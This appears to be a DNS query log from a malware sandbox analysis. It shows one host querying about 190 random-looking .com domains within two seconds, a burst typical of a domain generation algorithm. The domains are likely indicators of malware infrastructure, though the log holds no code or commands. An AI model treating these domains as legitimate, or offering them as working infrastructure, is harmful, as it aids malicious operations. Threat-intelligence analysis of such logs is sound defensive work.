                                                                                                                                                                                                          Nov 11, 2024 18:24:22.762512922 CET192.168.2.81.1.1.10x2b4fStandard query (0)gacyfih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.762878895 CET192.168.2.81.1.1.10xcb9aStandard query (0)puzyduq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.763044119 CET192.168.2.81.1.1.10x7dd7Standard query (0)vopykum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.764082909 CET192.168.2.81.1.1.10x2681Standard query (0)qeqyqep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.764415979 CET192.168.2.81.1.1.10xa58eStandard query (0)vofyzof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.764590979 CET192.168.2.81.1.1.10x3f86Standard query (0)pupylug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.765674114 CET192.168.2.81.1.1.10x40a2Standard query (0)vonymoc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.765846014 CET192.168.2.81.1.1.10x7fc1Standard query (0)lysylun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.766026020 CET192.168.2.81.1.1.10x5d46Standard query (0)galydyw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.766196012 CET192.168.2.81.1.1.10xfb65Standard query (0)lygyxad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.775088072 CET192.168.2.81.1.1.10x6804Standard query (0)pupytiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.776681900 CET192.168.2.81.1.1.10x1f00Standard query (0)volydyk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.776940107 CET192.168.2.81.1.1.10xdff8Standard query (0)pumymap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.777981043 CET192.168.2.81.1.1.10xe232Standard query (0)gaqyqez.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.778373957 CET192.168.2.81.1.1.10x62d6Standard query (0)lyvynid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.778453112 CET192.168.2.81.1.1.10xc4a3Standard query (0)qetykyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.778626919 CET192.168.2.81.1.1.10xccf3Standard query (0)qexyfuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.778914928 CET192.168.2.81.1.1.10x6d89Standard query (0)qekysel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.779166937 CET192.168.2.81.1.1.10x2f15Standard query (0)vocybuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.779272079 CET192.168.2.81.1.1.10xd830Standard query (0)qebyniv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.779423952 CET192.168.2.81.1.1.10xdcc0Standard query (0)lymyjyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.779614925 CET192.168.2.81.1.1.10x2159Standard query (0)gatykyh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.779653072 CET192.168.2.81.1.1.10x1a08Standard query (0)lyryjej.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.779848099 CET192.168.2.81.1.1.10x7f80Standard query (0)vojypat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.779916048 CET192.168.2.81.1.1.10x9ee7Standard query (0)ganynos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.780209064 CET192.168.2.81.1.1.10x634aStandard query (0)puzybil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.792960882 CET192.168.2.81.1.1.10xf02eStandard query (0)puvybuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.794233084 CET192.168.2.81.1.1.10xc3f0Standard query (0)lyxynir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.281960011 CET192.168.2.81.1.1.10xad5fStandard query (0)gacyvub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.289123058 CET192.168.2.81.1.1.10x7996Standard query (0)vowyjak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.301908016 CET192.168.2.81.1.1.10xcdb3Standard query (0)qexyvyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.317126989 CET192.168.2.81.1.1.10x1680Standard query (0)qeqyhol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.322336912 CET192.168.2.81.1.1.10xd209Standard query (0)vonygit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.328840017 CET192.168.2.81.1.1.10x90e6Standard query (0)pupywyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.341919899 CET192.168.2.81.1.1.10xb690Standard query (0)qekyxaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.356048107 CET192.168.2.81.1.1.10xdaf7Standard query (0)ganyfuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.359088898 CET192.168.2.81.1.1.10x665bStandard query (0)vopyqef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.371098042 CET192.168.2.81.1.1.10xfd19Standard query (0)gatyhos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.393834114 CET192.168.2.81.1.1.10xd918Standard query (0)lyryman.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.406198025 CET192.168.2.81.1.1.10xd036Standard query (0)gahyziw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.407701969 CET192.168.2.81.1.1.10xaf83Standard query (0)lykytin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.410736084 CET192.168.2.81.1.1.10x3fc7Standard query (0)qebyfup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.412549973 CET192.168.2.81.1.1.10xe732Standard query (0)gadykyz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.413563967 CET192.168.2.81.1.1.10xb2faStandard query (0)puzypav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.416893005 CET192.168.2.81.1.1.10x55c0Standard query (0)pujytug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.439410925 CET192.168.2.81.1.1.10x525aStandard query (0)lyxysad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.450527906 CET192.168.2.81.1.1.10x857aStandard query (0)gaqynih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.450711966 CET192.168.2.81.1.1.10x27acStandard query (0)pufylul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.450871944 CET192.168.2.81.1.1.10xcbe5Standard query (0)qexysev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.451702118 CET192.168.2.81.1.1.10xb981Standard query (0)puvydyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.452133894 CET192.168.2.81.1.1.10xd0c1Standard query (0)vowymom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.465215921 CET192.168.2.81.1.1.10xa680Standard query (0)purymog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.465713978 CET192.168.2.81.1.1.10xfc40Standard query (0)gatyqeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.465887070 CET192.168.2.81.1.1.10xef88Standard query (0)pumybuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.466032982 CET192.168.2.81.1.1.10x1d48Standard query (0)vofyruc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.466188908 CET192.168.2.81.1.1.10x3303Standard query (0)ganyvyw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.466420889 CET192.168.2.81.1.1.10x1c11Standard query (0)vonybuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.466577053 CET192.168.2.81.1.1.10x22c4Standard query (0)qekytig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.467130899 CET192.168.2.81.1.1.10x3d4Standard query (0)lysyjex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.467243910 CET192.168.2.81.1.1.10x996dStandard query (0)qeqyniq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.467386961 CET192.168.2.81.1.1.10x206fStandard query (0)lyvyfux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.467540979 CET192.168.2.81.1.1.10x32f0Standard query (0)galypob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.467749119 CET192.168.2.81.1.1.10xd19aStandard query (0)volypof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.467888117 CET192.168.2.81.1.1.10x4513Standard query (0)qedykep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.468044043 CET192.168.2.81.1.1.10x8191Standard query (0)pumygil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.468206882 CET192.168.2.81.1.1.10x67a8Standard query (0)galycah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.468353033 CET192.168.2.81.1.1.10x2ed8Standard query (0)volycem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.468504906 CET192.168.2.81.1.1.10x7041Standard query (0)qedyruv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.468647957 CET192.168.2.81.1.1.10x4733Standard query (0)lymygor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.468791962 CET192.168.2.81.1.1.10x69f3Standard query (0)puzyceg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.468947887 CET192.168.2.81.1.1.10x2bd8Standard query (0)pujyxoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.469111919 CET192.168.2.81.1.1.10x71aeStandard query (0)vojyrum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.469259977 CET192.168.2.81.1.1.10x80aStandard query (0)lyvyver.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.469405890 CET192.168.2.81.1.1.10x1a28Standard query (0)gacydes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.469562054 CET192.168.2.81.1.1.10xcdc3Standard query (0)vojyzik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.469715118 CET192.168.2.81.1.1.10x849dStandard query (0)vofykyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.481894016 CET192.168.2.81.1.1.10xfbf8Standard query (0)vocydyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.482558012 CET192.168.2.81.1.1.10xf15cStandard query (0)lysywyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.482955933 CET192.168.2.81.1.1.10x94abStandard query (0)qegylul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.484754086 CET192.168.2.81.1.1.10x54dStandard query (0)pufytip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.484914064 CET192.168.2.81.1.1.10x3bb1Standard query (0)vopyjac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.491170883 CET192.168.2.81.1.1.10x682Standard query (0)lyxyvyn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.493506908 CET192.168.2.81.1.1.10xf630Standard query (0)pupyjap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.516485929 CET192.168.2.81.1.1.10x4d79Standard query (0)gadyrus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.516511917 CET192.168.2.81.1.1.10x2b00Standard query (0)lykyxoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.516797066 CET192.168.2.81.1.1.10xcef2Standard query (0)gaqyhaw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.516994953 CET192.168.2.81.1.1.10xf9adStandard query (0)qetyqag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.517740011 CET192.168.2.81.1.1.10xbd5eStandard query (0)lygylur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.517947912 CET192.168.2.81.1.1.10x4324Standard query (0)qetyhov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.517997980 CET192.168.2.81.1.1.10xfec4Standard query (0)lymynuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.518191099 CET192.168.2.81.1.1.10x2d11Standard query (0)qebyvyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.528520107 CET192.168.2.81.1.1.10xc62fStandard query (0)lygytix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.007000923 CET192.168.2.81.1.1.10x280fStandard query (0)qexyxop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.010462999 CET192.168.2.81.1.1.10x29bStandard query (0)lygywyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.027153969 CET192.168.2.81.1.1.10x2742Standard query (0)volyrut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.028271914 CET192.168.2.81.1.1.10xa1d2Standard query (0)qedyhiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.028999090 CET192.168.2.81.1.1.10x2805Standard query (0)pumycav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.033610106 CET192.168.2.81.1.1.10xd081Standard query (0)gadyhoh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.035629988 CET192.168.2.81.1.1.10x3c7Standard query (0)galyryz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.047533989 CET192.168.2.81.1.1.10xb452Standard query (0)lysygij.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.048887014 CET192.168.2.81.1.1.10xeb2eStandard query (0)pupyguq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.049413919 CET192.168.2.81.1.1.10x12eStandard query (0)ganycob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.050230980 CET192.168.2.81.1.1.10xadafStandard query (0)lykywex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.050337076 CET192.168.2.81.1.1.10x8e81Standard query (0)qekyryp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.050941944 CET192.168.2.81.1.1.10x468Standard query (0)puvycel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.051161051 CET192.168.2.81.1.1.10x1b73Standard query (0)gahyruh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.051701069 CET192.168.2.81.1.1.10x51cdStandard query (0)lyrygid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.051779032 CET192.168.2.81.1.1.10x58ecStandard query (0)vowyguf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.056968927 CET192.168.2.81.1.1.10x85f2Standard query (0)ganydeh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.065920115 CET192.168.2.81.1.1.10x3c09Standard query (0)lykylud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.066096067 CET192.168.2.81.1.1.10x3597Standard query (0)gaqyfub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.066415071 CET192.168.2.81.1.1.10xed1eStandard query (0)lysymor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.066615105 CET192.168.2.81.1.1.10x349aStandard query (0)vonydem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.066819906 CET192.168.2.81.1.1.10x855bStandard query (0)pumydyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.067183018 CET192.168.2.81.1.1.10xf043Standard query (0)pujylyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.067379951 CET192.168.2.81.1.1.10xd355Standard query (0)volyzic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.069334984 CET192.168.2.81.1.1.10x2827Standard query (0)lymyfyn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.070612907 CET192.168.2.81.1.1.10x42fStandard query (0)qedyqal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.071604967 CET192.168.2.81.1.1.10x84a9Standard query (0)qekyluv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.071866989 CET192.168.2.81.1.1.10xc780Standard query (0)gadyqaw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.072489977 CET192.168.2.81.1.1.10xdbe7Standard query (0)puzyxip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.073900938 CET192.168.2.81.1.1.10xcedfStandard query (0)qeqyfug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.075335026 CET192.168.2.81.1.1.10xdb6eStandard query (0)qetynup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.088627100 CET192.168.2.81.1.1.10xbfa6Standard query (0)vofyqek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.089690924 CET192.168.2.81.1.1.10xdb19Standard query (0)pupymol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.090740919 CET192.168.2.81.1.1.10x4838Standard query (0)galyzus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.091094971 CET192.168.2.81.1.1.10x5542Standard query (0)qegykeg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.091262102 CET192.168.2.81.1.1.10x6a20Standard query (0)lyrynux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.091712952 CET192.168.2.81.1.1.10x20e6Standard query (0)puvypoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.091773033 CET192.168.2.81.1.1.10xbb58Standard query (0)vonycaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.091912985 CET192.168.2.81.1.1.10x19bfStandard query (0)gacycaz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.092030048 CET192.168.2.81.1.1.10x9584Standard query (0)lymyved.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.092196941 CET192.168.2.81.1.1.10x5871Standard query (0)vofyjom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.092505932 CET192.168.2.81.1.1.10x36a9Standard query (0)vowybyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.095715046 CET192.168.2.81.1.1.10x539eStandard query (0)gaqyvys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.102572918 CET192.168.2.81.1.1.10x12a8Standard query (0)purygiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.102893114 CET192.168.2.81.1.1.10x4dd0Standard query (0)vocypok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.103166103 CET192.168.2.81.1.1.10xe783Standard query (0)vopymit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.103390932 CET192.168.2.81.1.1.10x986dStandard query (0)vojykyf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.103523970 CET192.168.2.81.1.1.10x25beStandard query (0)lyxyxox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.103766918 CET192.168.2.81.1.1.10x510aStandard query (0)pufyjag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.104115963 CET192.168.2.81.1.1.10x5Standard query (0)lyvysaj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.104182959 CET192.168.2.81.1.1.10x624dStandard query (0)pufyweq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.104543924 CET192.168.2.81.1.1.10x1109Standard query (0)lygyjan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.104655981 CET192.168.2.81.1.1.10x3528Standard query (0)gacypiw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.104867935 CET192.168.2.81.1.1.10x27b0Standard query (0)gatyniz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.104998112 CET192.168.2.81.1.1.10x4769Standard query (0)lyxytur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.108128071 CET192.168.2.81.1.1.10x8be5Standard query (0)qexytil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.108695030 CET192.168.2.81.1.1.10x2444Standard query (0)vocycat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.108814955 CET192.168.2.81.1.1.10x48c5Standard query (0)purybup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.109180927 CET192.168.2.81.1.1.10xc5e9Standard query (0)gahykeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.109430075 CET192.168.2.81.1.1.10x4dbStandard query (0)vopyguk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.109513998 CET192.168.2.81.1.1.10xab9fStandard query (0)puzytul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.132097006 CET192.168.2.81.1.1.10xa1b2Standard query (0)qebysaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.132529020 CET192.168.2.81.1.1.10xb320Standard query (0)qegyryq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.132541895 CET192.168.2.81.1.1.10x9408Standard query (0)qeqyvev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.610183001 CET192.168.2.81.1.1.10x24b9Standard query (0)pujywep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.610431910 CET192.168.2.81.1.1.10x69bbStandard query (0)qebyxog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.614903927 CET192.168.2.81.1.1.10x819eStandard query (0)lyvyxin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.620711088 CET192.168.2.81.1.1.10xd4dfStandard query (0)vojyqac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.624219894 CET192.168.2.81.1.1.10xf2bbStandard query (0)gahyqas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.627198935 CET192.168.2.81.1.1.10x2b69Standard query (0)gatyfuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.643320084 CET192.168.2.81.1.1.10xc154Standard query (0)vowycok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.643511057 CET192.168.2.81.1.1.10xaecfStandard query (0)vocyryf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.651710033 CET192.168.2.81.1.1.10xf41dStandard query (0)qexyreg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.668806076 CET192.168.2.81.1.1.10x7400Standard query (0)pufygup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.669006109 CET192.168.2.81.1.1.10xc26aStandard query (0)gaqycow.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.669764042 CET192.168.2.81.1.1.10x77fStandard query (0)lyxywen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.682343006 CET192.168.2.81.1.1.10xb454Standard query (0)ganypis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.685319901 CET192.168.2.81.1.1.10x5163Standard query (0)lyvytud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.685934067 CET192.168.2.81.1.1.10x2452Standard query (0)gatyveh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.687715054 CET192.168.2.81.1.1.10x29cdStandard query (0)pufymiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.689266920 CET192.168.2.81.1.1.10x48f7Standard query (0)qegyhip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.694878101 CET192.168.2.81.1.1.10x46a5Standard query (0)pupybyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.695846081 CET192.168.2.81.1.1.10xe83Standard query (0)vonypic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.695858002 CET192.168.2.81.1.1.10xd24Standard query (0)qekykal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.696187973 CET192.168.2.81.1.1.10x1f03Standard query (0)pumypop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.699510098 CET192.168.2.81.1.1.10x83c6Standard query (0)galykew.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.699847937 CET192.168.2.81.1.1.10xc44dStandard query (0)lysynun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.702136040 CET192.168.2.81.1.1.10x34b8Standard query (0)gaqydaz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.712369919 CET192.168.2.81.1.1.10x7efeStandard query (0)qedynug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.712738037 CET192.168.2.81.1.1.10x4ba2Standard query (0)volykek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.712860107 CET192.168.2.81.1.1.10xda81Standard query (0)lyxylyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.712924957 CET192.168.2.81.1.1.10x36f9Standard query (0)lygygux.comA (IP address)IN (0x0001)false
